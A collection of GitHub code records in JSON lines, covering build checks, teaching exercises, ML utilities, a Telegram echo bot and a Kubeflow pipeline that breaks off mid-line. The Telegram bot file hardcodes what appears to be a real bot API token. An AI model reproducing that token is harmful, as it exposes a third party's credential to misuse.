tests.append(input_api.canned_checks.CheckCIPDManifest(\n input_api, output_api, path=path))\n else:\n pkg = 'infra/tools/cipd/${platform}'\n ver = input_api.ReadFile(path)\n tests.append(input_api.canned_checks.CheckCIPDManifest(\n input_api, output_api,\n content=CIPD_CLIENT_ENSURE_FILE_TEMPLATE % (pkg, ver)))\n tests.append(input_api.canned_checks.CheckCIPDClientDigests(\n input_api, output_api, client_version_file=path))\n\n return input_api.RunTests(tests)\n\n\ndef CheckOwnersFormat(input_api, output_api):\n return input_api.canned_checks.CheckOwnersFormat(input_api, output_api)\n\n\ndef CheckOwnersOnUpload(input_api, output_api):\n return input_api.canned_checks.CheckOwners(input_api, output_api,\n allow_tbr=False)\n\ndef CheckDoNotSubmitOnCommit(input_api, output_api):\n return input_api.canned_checks.CheckDoNotSubmit(input_api, output_api)\n\n\ndef CheckPatchFormatted(input_api, output_api):\n # TODO(https://crbug.com/979330) If clang-format is fixed for non-chromium\n # repos, remove check_clang_format=False so that proto files can be formatted\n return input_api.canned_checks.CheckPatchFormatted(input_api,\n output_api,\n check_clang_format=False)\n","repo_name":"iridium-browser/iridium-browser","sub_path":"third_party/depot_tools/PRESUBMIT.py","file_name":"PRESUBMIT.py","file_ext":"py","file_size_in_byte":5879,"program_lang":"python","lang":"en","doc_type":"code","stars":314,"dataset":"github-code","pt":"53"} +{"seq_id":"3285309039","text":"\n'''\nAn example of how to use the \nLVIS python scripts\n'''\n\n# import the HDF5 data handler class\n\nfrom lvisClass import lvisData\n\n\n\n##########################################\n\nclass plotLVIS(lvisData):\n '''A class, ineriting from lvisData\n and add a plotting method'''\n\n def reprojectLVIS(self,outEPSG):\n '''A method to reproject the geolocation data'''\n # method incomplete\n\n\n def plotWaves(self):\n '''A method to plot all waveforms'''\n # this needs completing\n\n\n\n##########################################\n\n\nif __name__==\"__main__\":\n '''Main block'''\n\n filename='/geos/netdata/oosa/week4/lvis_antarctica/ILVIS1B_AQ2015_1014_R1605_070717.h5'\n\n # create instance of class with \"onlyBounds\" flag\n b=plotLVIS(filename,onlyBounds=True)\n\n # to make a MWE,\n # from the total file bounds\n # choose a spatial subset\n x0=b.bounds[0]\n y0=b.bounds[1]\n x1=(b.bounds[2]-b.bounds[0])/20+b.bounds[0]\n y1=(b.bounds[3]-b.bounds[1])/20+b.bounds[1]\n\n\n # read in all data within our spatial subset\n lvis=plotLVIS(filename,minX=x0,minY=y0,maxX=x1,maxY=y1)\n\n # set elevation\n lvis.setElevations()\n\n\n # reproject the data\n\n # plot up some waveforms using your new method\n\n","repo_name":"edinburgh-university-OOSA/OOSA-code-public","sub_path":"week4/hdf/lvisExample.py","file_name":"lvisExample.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"3754517773","text":"import six\nfrom six.moves import cPickle\n\ndef set_lr(optimizer, lr):\n for group in optimizer.param_groups:\n group['lr'] = lr\n\ndef add_summary_value(writer, key, value, iteration):\n if writer:\n writer.add_scalar(key, value, iteration)\n\ndef pickle_load(f):\n \"\"\" Load a pickle.\n Parameters\n ----------\n f: file-like object\n \"\"\"\n if six.PY3:\n return cPickle.load(f, encoding='latin-1')\n else:\n return cPickle.load(f)\n\ndef pickle_dump(obj, f):\n \"\"\" Dump a pickle.\n Parameters\n ----------\n obj: pickled object\n f: file-like object\n \"\"\"\n if six.PY3:\n return cPickle.dump(obj, f, protocol=2)\n else:\n return cPickle.dump(obj, f)\n\ndef verb_rank_merge(la, lb):\n merge_idx = []\n same_idx = []\n idx_in_b = [] # 相同的值在list b中的顺序\n origin_idx_in_b = []\n for idx_a in la:\n merge_idx.append(idx_a) # 复制la到merge_idx\n for j, idx_b in enumerate(lb):\n if idx_a == idx_b:\n same_idx.append(idx_a)\n idx_in_b.append(j)\n origin_idx_in_b.append(j)\n break\n # 检测lb里的same_idx是否排列出错\n idx_in_b.sort()\n if origin_idx_in_b != idx_in_b:\n for j, idx in enumerate(idx_in_b):\n lb[idx] = same_idx[j]\n # 遍历lb里不是重合的词,将其插入la中\n right_idx = None\n right_idxs = {}\n for idx in reversed(lb):\n if idx not in same_idx:\n right_idxs[idx] = right_idx\n else:\n right_idx = idx\n for idx in lb:\n if idx not in same_idx:\n r_idx = right_idxs[idx]\n if r_idx is None:\n merge_idx.append(idx)\n else:\n for j, idx_m in enumerate(merge_idx):\n if idx_m == r_idx:\n merge_idx.insert(j, idx)\n break\n return merge_idx\n\ndef clip_gradient(optimizer, grad_clip):\n for group in optimizer.param_groups:\n for param in group['params']:\n param.grad.data.clamp_(-grad_clip, grad_clip)\n\ndef get_mapping(word_file):\n dict_ = {}\n word_list = []\n # idx = 0 means no verb\n word_list.append('non-verb')\n with open(word_file) as f:\n verb_2_idx = json.load(f)\n verb_num = len(verb_2_idx) + 1\n for verb, idx in verb_2_idx.items():\n dict_[verb] = idx + 1\n word_list.append(verb)\n\n return dict_, word_list, verb_num\n","repo_name":"mad-red/VSR-guided-CIC","sub_path":"utils/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"53"} +{"seq_id":"26153588190","text":"# Function Map and filter\n# Пример №1 функция map применяет другую функцию к списку\ndef add_five(x):\n\treturn x + 5\nnums = [11, 22, 33, 44, 55]\nresult = list(map(add_five, nums))\nprint(result)\n# можно записать через ононимную функцию lambda\nnums = [11, 22, 33, 44, 55]\nresult = list(map(lambda x: x + 5, nums))\nprint(result)\n# Пример №2 функция filter удаляте элементы списка не подходящие под условие функции\nnums = [11, 22, 33, 44, 55]\nres = list(filter(lambda x: x % 2 == 0, nums))\nprint(res)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"zarkaltair/Learn-python","sub_path":"Lessons by HoudyHo/lesson (26).py","file_name":"lesson (26).py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30052778162","text":"import logging\n\nfrom aiogram import Bot, Dispatcher, executor, types\n\nAPI_TOKEN = \"6088589041:AAERXBaGeGOcvtzfbSfGoCNm-b_1u30V-zE\"\nlogging.basicConfig(level=logging.INFO)\n\nbot = Bot(token=API_TOKEN)\ndp = Dispatcher(bot)\n\n\n@dp.message_handler(commands=['start', 'help'])\nasync def send_hush_kelibsiz(message: types.Message):\n await message.reply(\"Salom men Sunnat botman Sunnatillo tomonidan yaratilganman\")\n\n\n@dp.message_handler()\nasync def answer(message: types.Message):\n await message.reply(message.text)\n\n\nif __name__ == '__main__':\n executor.start_polling(dp, skip_updates=True)\n","repo_name":"sunnatila/echo-bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"2680424989","text":"\nimport sys\nfrom distutils.core import setup, Extension\n\nif sys.version_info[0] == 2:\n\tver_define = ('PYTHON2', '1')\nelif sys.version_info[0] == 3:\n\tver_define = ('PYTHON3', '1')\n\nlibjio = Extension(\"libjio\",\n\t\tlibraries = ['jio'],\n\t\tsources = ['libjio.c'],\n\t\tdefine_macros = [ver_define],\n\n\t\t# these two allow us to build without having libjio installed,\n\t\t# assuming we're in the libjio source tree\n\t\tinclude_dirs = ['../../libjio/'],\n\t\tlibrary_dirs=['../../libjio/build/']\n\t)\n\nsetup(\n\tname = 'libjio',\n\tversion = '1.02',\n\tdescription = \"A library for journaled, transactional I/O\",\n\tauthor = \"Alberto Bertogli\",\n\tauthor_email = \"albertito@blitiri.com.ar\",\n\turl = \"http://blitiri.com.ar/p/libjio\",\n\text_modules = [libjio],\n\tclassifiers = [\n\t\t\"License :: Public Domain\",\n\t\t\"Operating System :: POSIX\",\n\t\t\"Programming Language :: C\",\n\t\t\"Programming Language :: Python\",\n\t\t\"Programming Language :: Python :: 2\",\n\t\t\"Programming Language :: Python :: 3\",\n\t\t\"Topic :: Software Development\",\n\t\t\"Topic :: Software Development :: Libraries\",\n\t],\n)\n\n","repo_name":"albertito/libjio","sub_path":"bindings/python/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"53"} +{"seq_id":"43040673780","text":"# Johann Diep (jdiep@student.ethz.ch) - January 2019\n\n# This file is responsible for the optimization algorithm.\n\n\n# external libraries\nimport torch\nimport math\nfrom tqdm import tqdm\nfrom pyquaternion import Quaternion\n\n\ntorch.set_default_tensor_type(torch.cuda.FloatTensor) # using CUDA\n\n\nclass Optimization():\n\tdef __init__(self, framework, cur_tran_SE3, cur_quat):\n\t\tsuper(Optimization, self).__init__()\n\n\t\tself.framework = framework # initializing framework\n\t\t\n\t\t# ground-truth pose\n\t\tself.cur_tran_SE3 = cur_tran_SE3\n\t\tself.cur_quat = cur_quat\n\n\t\tself.rounds = 100 # max rounds for iterations\n\t\tself.minimal_loss = 99999999999 # random high number\n\t\tself.convergence = False # convergence flag\n\n\tdef Adam(self):\n\t\tlr = 0.01 # learning rate\n\t\t\n\t\tprint(\"*** Start optimization with Adam algorithm with learning rate {}.\".format(lr)) # print statement\n\n\t\toptimizer = torch.optim.Adam(self.framework.parameters(), lr = lr) # optimizer to be tuned\n\n\t\tloop = tqdm(range(self.rounds)) # rounds visualization\n\n \t# loop optimization\n\t\tfor i in loop:\n\t\t\t# current loop translation\n\t\t\tsolved_pose_se3 = self.framework.cur_pose_se3\n\t\t\tsolved_tran_SE3 = (self.framework.se3_exp(solved_pose_se3)[0,:,3]).detach().cpu().numpy()\n\t\t\t\n\t\t\tsolved_tran_error = math.sqrt((solved_tran_SE3[0] - self.cur_tran_SE3[0]) ** 2 + (solved_tran_SE3[1] - self.cur_tran_SE3[1]) ** 2 + (solved_tran_SE3[2] - self.cur_tran_SE3[2]) ** 2) # current loop translation error\n\n\t\t\tminimal_tran_SE3 = solved_tran_SE3 # copy\n\t\t\t\n\t\t\t# current loop rotation\n\t\t\tsolved_aa = (self.framework.cur_pose_se3[3:]).detach().cpu().numpy()\n\t\t\tsolved_aa_angle = math.sqrt(solved_aa[0] ** 2 + solved_aa[1] ** 2 + solved_aa[2] ** 2)\n\n\t\t\tsolved_rot_error = math.fabs(solved_aa_angle - Quaternion(self.cur_quat).angle) # current loop rotation error\n\n\t\t\tminimal_aa = solved_aa # copy\n\t\t\tminimal_aa_angle = solved_aa_angle # copy\n\n\t\t\t# convergence condition\n\t\t\tif (solved_tran_error < 0.01 and solved_rot_error < 0.02):\n\t\t\t\tloop.close()\n\t\t\t\tself.convergence = True\n\t\t\t\tbreak\n\n\t\t\toptimizer.zero_grad() # set gradients to zero \n \n\t\t\t# calculating loss function and backpropagating\n\t\t\tloss = self.framework.forward()\n\t\t\tloss.backward()\n\t\t\toptimizer.step()\n\n\t\t\t# if no convergence, take the closest solution\n\t\t\tif loss.data < self.minimal_loss:\n\t\t\t\tself.minimal_loss = loss.data\n\n\t\t\t\t# save pose\n\t\t\t\tminimal_tran_SE3 = solved_tran_SE3\n\t\t\t\tminimal_aa = solved_aa\n\t\t\t\tminimal_aa_angle = solved_aa_angle\n\t\t\t\tminimal_pose_se3 = self.framework.cur_pose_se3\n\n\n\t\t\tloop.set_description(\"*** Optimizing, current loss at %.4f.\" % loss.data) # loss print\n\n\t\t# if convergence\n\t\tif self.convergence == True:\n\t\t\tprint(solved_pose_se3)\n\t\t\tsolved_quat = Quaternion(axis = solved_aa / solved_aa_angle, angle = solved_aa_angle) \n\t\t\treturn solved_tran_SE3, solved_quat\n\n\t\t# if no convergence\n\t\telse:\n\t\t\tprint(minimal_pose_se3)\n\t\t\tminimal_quat = Quaternion(axis = minimal_aa / minimal_aa_angle, angle = minimal_aa_angle)\n\t\t\treturn minimal_tran_SE3, minimal_quat","repo_name":"johanndiep/semester-thesis","sub_path":"neural_mesh_renderer/OBMBACPE/lib/optimization.py","file_name":"optimization.py","file_ext":"py","file_size_in_byte":2991,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"18049573101","text":"import datetime\nimport json\nimport user_interaction as ui\n\n\ndef create_note(notes):\n note_id = get_unique_id(notes)\n note_title = ui.read(\"Введите заголовок заметки\")\n note_body = ui.read(\"Введите содержимое заметки\")\n note_created_at = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n return {\n \"id\" : note_id,\n \"title\" : note_title,\n \"body\" : note_body,\n \"created_at\" : note_created_at,\n \"last_update\" : note_created_at\n }\n\n\ndef update_note(note):\n title = ui.read(\"Введите новый заголовок:\")\n body = ui.read(\"Введите новое содержимое:\")\n note['title'] = title\n note['body'] = body\n note['last_update'] = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n\ndef delete_note(notes, note_id):\n for note in notes:\n if note['id'] == int(note_id):\n notes.remove(note)\n return True\n return False\n\n\ndef get_unique_id(data):\n ids = set()\n for item in data:\n if 'id' in item:\n ids.add(item['id'])\n\n new_unique_id = 0\n while new_unique_id in ids:\n new_unique_id += 1\n\n return new_unique_id\n","repo_name":"InVeRnyako/Python_test_01","sub_path":"edit.py","file_name":"edit.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4251718435","text":"import numpy as np\nfrom os.path import join\nimport tensorflow as tf\n\nfrom tf_parser import Parser\n\n#device_string = '/device:GPU:0'\ndevice_string = '/device:CPU:0'\n\n## definition of epoch in terms of batch number\n## 34801/1004/1509 Train/Valid/Test data\nbatch_size = 32\nbatch_per_training_epoch = int(np.floor(5*1004/32)) #int(np.floor(7490/32))\n\n## batches to be used during statistics collections\nbatch_per_validation_epoch = int(np.floor(1004/32)) #int(np.floor(994/32))\n\nlearning_rate_info = dict()\nlearning_rate_info['init_rate'] = 0.0005\nlearning_rate_info['decay_steps'] = 30 * batch_per_validation_epoch\nlearning_rate_info['decay_factor'] = 0.95\nlearning_rate_info['staircase']=True\n\n##loss operations\nloss_op=tf.losses.sparse_softmax_cross_entropy\none_hot=False\nloss_op_kwargs = None\n\n##optimizers\noptimizer = tf.train.AdamOptimizer\noptimizer_kwargs = None\n\nimage_height = 128\nimage_width = 128\nimage_channel = 3\n\nclass_numbers = 7\nclass_weights = np.array([21.48717949, 12.85933504, 6.22277228, 5.93624557, 1., 46.12844037, 53.4893617])\nclass_weights = class_weights[np.newaxis, 1]\n\ncheckpoint_path = './checkpoints4'\nmodel_checkpoint_path = join( checkpoint_path, 'model.ckpt')\nprior_weights = None\ntrain_summary_path = join( checkpoint_path, 'train' )\nvalid_summary_path = join( checkpoint_path, 'valid' )\n\n\ntrain_tfrecords = '/home/rajib/skin/record/train.tfrecords'\nvalid_tfrecords = '/home/rajib/skin/record/test.tfrecords'\n\n## information for parsing the tfrecord\nfeatures = {'image': tf.FixedLenFeature([], tf.string),\n 'disease_label': tf.FixedLenFeature([], tf.int64),\n 'cancer_label' : tf.FixedLenFeature([], tf.int64),\n 'decision_type' : tf.FixedLenFeature([], tf.int64),\n 'age' : tf.FixedLenFeature([], tf.float32),\n 'sex' : tf.FixedLenFeature([], tf.int64),\n 'localization' : tf.FixedLenFeature([], tf.int64)}\ntrain_parser = Parser(features, True, image_height, image_width)\nvalid_parser = Parser(features, False, image_height, image_width)\n","repo_name":"rajibchakravorty/ham_analysis","sub_path":"analysis/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24196701965","text":"import typing as T\n\nimport hydra\nimport omegaconf\nimport pytorch_lightning as pl\n\n\ndef instantiate_callbacks(callbacks_cfg: omegaconf.DictConfig) -> T.List[pl.Callback]:\n \"\"\"Instantiates callbacks from config.\"\"\"\n\n callbacks: T.List[pl.Callback] = []\n\n if not callbacks_cfg:\n return callbacks\n\n if not isinstance(callbacks_cfg, omegaconf.DictConfig):\n raise TypeError(\"Callbacks config must be a DictConfig!\")\n\n for _, cb_conf in callbacks_cfg.items():\n if isinstance(cb_conf, omegaconf.DictConfig) and \"_target_\" in cb_conf:\n callbacks.append(hydra.utils.instantiate(cb_conf))\n\n return callbacks\n","repo_name":"chris-santiago/vime","sub_path":"vime/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32990933352","text":"import datetime\n\nfrom django.test import TestCase\nfrom pysnmp.hlapi import ObjectIdentity, ObjectType\n\nfrom .. import constants, models\n\n\ndef make_timestamp() -> float:\n \"\"\"\n Calculates current time as numbers of seconds since epoch.\n\n :return: timestamp\n \"\"\"\n return (datetime.datetime.utcnow() - constants.EPOCH).total_seconds()\n\n\nclass DataTestCase(TestCase):\n \"\"\"\n Base class for test requiring fixtures and/or payloads.\n \"\"\"\n fixtures = ['collector/tests/fixtures.json']\n\n @classmethod\n def setUpTestData(cls):\n cls.hostname = 'host1'\n host = models.Host.objects.get(name=cls.hostname)\n\n base_payload = {\n 'host': cls.hostname,\n 'timestamp': make_timestamp()\n }\n\n cls.payload = dict(base_payload)\n cls.payload['samples'] = [\n {\n 'parameter': parameter.name,\n 'instance': instance.name,\n 'value': 1\n }\n for instance in host.instances.all()\n for parameter in instance.group.parameters.all()\n ]\n\n cls.payload_int = dict(base_payload)\n cls.payload_int['samples'] = [\n {\n 'parameter': 'CPU',\n 'value': 10\n }\n ]\n\n cls.payload_float = dict(base_payload)\n cls.payload_float['samples'] = [\n {\n 'parameter': 'CPU',\n 'value': 10.1\n }\n ]\n\n cls.payload_bool = dict(base_payload)\n cls.payload_bool['samples'] = [\n {\n 'parameter': 'CPU',\n 'value': True\n }\n ]\n\n cls.payload_str = dict(base_payload)\n cls.payload_str['samples'] = [\n {\n 'parameter': 'CPU',\n 'value': 'spam'\n }\n ]\n\n cls.payload_array = dict(base_payload)\n cls.payload_array['samples'] = [\n {\n 'parameter': 'CPU',\n 'value': ['spam', 'ham', 'egg']\n }\n ]\n\n\ndef get_cmd_factory(cls, value):\n \"\"\"\n A function factory producing replacements for pysnmp.hlapi.getCmd.\n Its products are used in tests to decouple testing from external\n entities by mimicking SNMP GET results normally fetched over the\n network. All SNMP objects are of cls type and have value of value.\n\n :param cls: expected type of SNMP object\n :param value: expected value of SNMP object\n :return: a callable with same API as pysnmp.hlapi.getCmd\n \"\"\"\n def wrapper(_snmp_engine, _auth_data, _transport_target, _context_data,\n *var_binds, **_options):\n \"\"\"\n Ignores all parameters but var_binds and returns it updated with\n value. Accepts same arguments and returns similar result as\n pysnmp.hlapi.getCmd.\n\n :param _snmp_engine: ignored parameter\n :param _auth_data: ignored parameter\n :param _transport_target: ignored parameter\n :param _context_data: ignored parameter\n :param var_binds: tuple of parameters\n :param _options: ignored parameter\n :return: same as pysnmp.hlapi.getCmd\n \"\"\"\n def make_value(parameter):\n \"\"\"\n Takes given parameter and returns it recreated and filled in\n with value.\n\n :param parameter: SNMP parameter\n :return: SNMP parameter with value\n \"\"\"\n parameter._ObjectType__state = ObjectType.stClean\n parameter._ObjectType__args[0].__stage = ObjectIdentity.stClean\n identity, _value = parameter\n oid = str(identity._ObjectIdentity__args[0])\n identity = ObjectIdentity(oid)\n identity._ObjectIdentity__oid = oid\n identity._ObjectIdentity__state = ObjectIdentity.stClean\n val = ObjectType(identity, cls(value))\n val._ObjectType__state = ObjectType.stClean\n return val\n\n return iter(\n [[None, 0, 0, [make_value(bind) for bind in var_binds]]]\n )\n return wrapper\n","repo_name":"watcheye/watcheye-collector","sub_path":"collector/tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4090,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"16551525553","text":"import inspect\n\n\nclass A:\n\n @classmethod\n def b(cls, id=1):\n return id\n\n\nif __name__ == '__main__':\n key_pattern = \"%s:%s:v2\" % (\"{cls.__name__}\", \"{id}\")\n print(A.__name__)\n rv = inspect.getfullargspec(A.b)\n arg_names, kwonlydefaults = rv.args, rv.kwonlydefaults\n print(arg_names, kwonlydefaults)\n\n kw = kwonlydefaults.copy() if kwonlydefaults is not None else {}\n kw.update(zip(arg_names, [A, 1]))\n if callable(key_pattern):\n key = key_pattern(*[kw[name] for name in arg_names])\n else:\n key = key_pattern.format(*[kw[n] for n in arg_names], **kw)\n print(key)\n","repo_name":"nnlrl/MyBlog","sub_path":"models/tmp.py","file_name":"tmp.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35452248335","text":"# https://leetcode-cn.com/contest/biweekly-contest-26/problems/simplified-fractions/\nfrom typing import List\n\nclass Solution:\n\n def hcf(self, x,y):\n if x > y: smaller = y\n else: smaller = x\n\n for i in range(1, smaller + 1):\n if ((x % i == 0) and (y % i == 0)):\n hcf = i\n\n return hcf\n\n def simplifiedFractions(self, n: int) -> List[str]:\n if n == 0 or n ==1: return []\n res = []\n for i in range(2,n+1):\n for j in range(1, i):\n if self.hcf(i,j) == 1:\n res.append(str(j) + \"/\" + str(i))\n\n return res\n\n\ns = Solution()\nprint(s.simplifiedFractions(2))","repo_name":"azhu51/leetcode-practice","sub_path":"contest/medium_5397.py","file_name":"medium_5397.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13316388980","text":"def get_segments():\n with open(\"input.txt\", \"r\") as f:\n return [[x.split() for x in line.strip().split(' | ')] for line in f]\n\n\nsegments = get_segments()\npart_a = 0\npart_b = 0\nfor segment in segments:\n # Part 1\n seg_1s = [len(output) == 2 for output in segment[1]]\n seg_4s = [len(output) == 4 for output in segment[1]]\n seg_7s = [len(output) == 3 for output in segment[1]]\n seg_8s = [len(output) == 7 for output in segment[1]]\n part_a += sum([sum(seg_1s), sum(seg_4s), sum(seg_7s), sum(seg_8s)])\n\n # Part 2\n # Start with knowns\n code_1 = ''.join(sorted([x for x in segment[0] if len(x) == 2][0]))\n code_4 = ''.join(sorted([x for x in segment[0] if len(x) == 4][0]))\n code_7 = ''.join(sorted([x for x in segment[0] if len(x) == 3][0]))\n code_8 = ''.join(sorted([x for x in segment[0] if len(x) == 7][0]))\n decode = {code_1: '1', code_4: '4', code_7: '7', code_8: '8'}\n\n # Determine len sixes\n len_sixes = [x for x in segment[0] if len(x) == 6]\n seg_6 = [x for x in len_sixes if len(set(x).intersection(code_1)) == 1][0]\n seg_9 = [x for x in len_sixes if len(set(x).intersection(code_4)) == 4][0]\n seg_0 = [x for x in len_sixes if (x != seg_6) & (x != seg_9)][0]\n decode[''.join(sorted(seg_6))] = '6'\n decode[''.join(sorted(seg_9))] = '9'\n decode[''.join(sorted(seg_0))] = '0'\n\n # Determine len fives\n len_fives = [x for x in segment[0] if len(x) == 5]\n seg_3 = [x for x in len_fives if len(set(x).intersection(code_1)) == 2][0]\n seg_2 = [x for x in len_fives if len(set(x).intersection(code_4)) == 2][0]\n seg_5 = [x for x in len_fives if (x != seg_2) & (x != seg_3)][0]\n decode[''.join(sorted(seg_2))] = '2'\n decode[''.join(sorted(seg_3))] = '3'\n decode[''.join(sorted(seg_5))] = '5'\n\n decoded_output = int(''.join([decode.get(''.join(sorted(output)), output) for output in segment[1]]))\n part_b += decoded_output\n\nprint(f'Part A is {part_a}')\nprint(f'Part B is {part_b}')\n","repo_name":"n-parisi/advent-of-code-2021","sub_path":"pkg/08/08.py","file_name":"08.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11621137637","text":"\r\n#1\r\nhari = ['senin','selasa','rabu','kamis','jumat','sabtu','minggu']\r\ntry:\r\n inputhari = input(\"Masukkan hari : \")\r\n inputangka = int(input(\"Masukkan jumlah : \"))\r\n inputhari = inputhari.lower()\r\n if (inputhari not in hari):\r\n print(\"Nama hari yang anda masukkan salah\")\r\n else:\r\n sisa = inputangka % 7\r\n if (hari.index(inputhari)+sisa) > 6:\r\n sisa = sisa + hari.index(inputhari) - 7\r\n elif (hari.index(inputhari)+sisa < 0):\r\n sisa = sisa + hari.index(inputhari) + 7\r\n print(\"Hari ini hari {}. {} hari lagi adalah hari {}\".format(inputhari.capitalize(),str(inputangka),hari[sisa].capitalize()))\r\nexcept:\r\n print(\"Jumlah yang anda masukkan salah\")\r\n'''\r\n#2\r\nkalimat = input(\"Masukkan kalimat : \")\r\nfor a in kalimat:\r\n if a in [\"0\",\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\"]:\r\n print(\"Tidak menerima angka\")\r\n break\r\nelse:\r\n kalimat = kalimat.split()\r\n if kalimat.isalpha():\r\n for a in kalimat:\r\n print(a[::-1], end=\" \")\r\n print(\"\")\r\n else:\r\n\r\n#3\r\nkata1 = input(\"Masukkan kata : \")\r\nfor a in kata1:\r\n if a in [\"0\",\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\"]:\r\n print(\"Tidak menerima angka\")\r\n break\r\nelse:\r\n if kata1.isalpha():\r\n kata2 = kata1[::-1]\r\n if kata1.lower() == kata2.lower():\r\n print(\"Kata tersebut {} merupakan Palindrome\".format(kata1))\r\n else:\r\n print(\"Kata tersebut {} bukan merupakan Palindrome\".format(kata1))\r\n else:\r\n print(\"Tidak menerima di luar alphabet\")\r\n'''","repo_name":"hendritedjo/python_exercise","sub_path":"exercise-list.py","file_name":"exercise-list.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18467203670","text":"from typing import NamedTuple\n\nimport kfp\nfrom kfp import dsl\nfrom kfp.components import func_to_container_op, InputPath, OutputPath\nimport os\n\n\ndef clone_mlrepo(repo_url: str, branch: str, volume: dsl.PipelineVolume):\n image = \"alpine/git:latest\"\n\n commands = [\n f\"git clone --single-branch --branch {branch} {repo_url} /src/mlrepo/\",\n f\"cd /src/mlrepo/\",\n f\"ls\",\n ]\n\n op = dsl.ContainerOp(\n name=\"git clone\",\n image=image,\n command=[\"sh\"],\n arguments=[\"-c\", \" && \".join(commands)],\n pvolumes={\"/src/\": volume},\n )\n\n return op\n\n\ndef run_det_and_wait(detmaster: str, config: str, context: str) -> int:\n # Submit determined experiment via CLI\n import logging\n import os\n import re\n import subprocess\n\n logging.basicConfig(level=logging.INFO)\n os.environ['DET_MASTER'] = detmaster\n\n repo_dir = \"/src/mlrepo/\"\n\n config = os.path.join(repo_dir, config)\n context = os.path.join(repo_dir, context)\n cmd = [\"det\", \"e\", \"create\", config, context]\n submit = subprocess.run(cmd, capture_output=True)\n output = str(submit.stdout)\n experiment_id = int(re.search(\"Created experiment (\\d+)\", output)[1])\n logging.info(f\"Created Experiment {experiment_id}\")\n\n # Wait for experiment to complete via CLI\n wait = subprocess.run([\"det\", \"e\", \"wait\", str(experiment_id)])\n logging.info(f\"Experiment {experiment_id} completed!\")\n return experiment_id\n\n\nrun_det_and_wait_op = func_to_container_op(\n run_det_and_wait, base_image=\"davidhershey/detcli:1.9\"\n)\n\n\ndef register(detmaster: str, experiment_id: int, model_name: str) -> bool:\n # Submit determined experiment via CLI\n from determined.experimental import Determined\n import os\n\n os.environ['DET_MASTER'] = detmaster\n\n def get_validation_metric(checkpoint):\n metrics = checkpoint.validation['metrics']\n config = checkpoint.experiment_config\n searcher = config['searcher']\n smaller_is_better = bool(searcher['smaller_is_better'])\n metric_name = searcher['metric']\n metric = metrics['validationMetrics'][metric_name]\n return (metric, smaller_is_better)\n\n def is_better(c1, c2):\n m1, smaller_is_better = get_validation_metric(c1)\n m2, _ = get_validation_metric(c2)\n if smaller_is_better and m1 < m2:\n return True\n return False\n\n d = Determined()\n checkpoint = d.get_experiment(experiment_id).top_checkpoint()\n try:\n model = d.get_model(model_name)\n except: # Model not yet in registry\n print(f'Registering new Model: {model_name}')\n model = d.create_model(model_name)\n\n print(f'Registering new version: {model_name}')\n model.register_version(checkpoint.uuid)\n return True\n\n\nregister_op = func_to_container_op(\n register, base_image=\"davidhershey/detcli:1.9\"\n)\n\n\ndef create_seldon_op(\n detmaster: str,\n deployment_name: str,\n deployment_namespace: str,\n model_name: str,\n image: str,\n):\n command = [\n \"python\",\n \"create_seldon_deployment.py\",\n f'{deployment_name}',\n f'{deployment_namespace}',\n f'{detmaster}',\n f'{model_name}',\n '--image',\n f'{image}',\n ]\n return dsl.ContainerOp(\n name='Create Seldon Deployment',\n image='davidhershey/seldon-create:1.2',\n command=command,\n file_outputs={\n 'endpoint': '/tmp/endpoint.txt',\n }\n )\n\n\n@func_to_container_op\ndef print_op(message: str):\n \"\"\"Print a message.\"\"\"\n print(message)\n\n\n@dsl.pipeline(\n name=\"Determined Train and Deploy\",\n description=\"Train a model with Determined, deploy the result to Seldon\"\n)\ndef det_train_pipeline(\n detmaster,\n mlrepo=\"https://github.com/determined-ai/determined.git\",\n branch=\"0.13.0\",\n config=\"examples/official/trial/mnist_pytorch/const.yaml\",\n context=\"examples/official/trial/mnist_pytorch/\",\n model_name=\"mnist-prod\",\n deployment_name=\"mnist-prod-kf\",\n deployment_namespace=\"david\",\n image=\"davidhershey/seldon-mnist:1.6\"\n):\n volume_op = dsl.VolumeOp(\n name=\"create pipeline volume\",\n resource_name=\"mlrepo-pvc\",\n modes=[\"ReadWriteOnce\"],\n size=\"3Gi\",\n )\n clone = 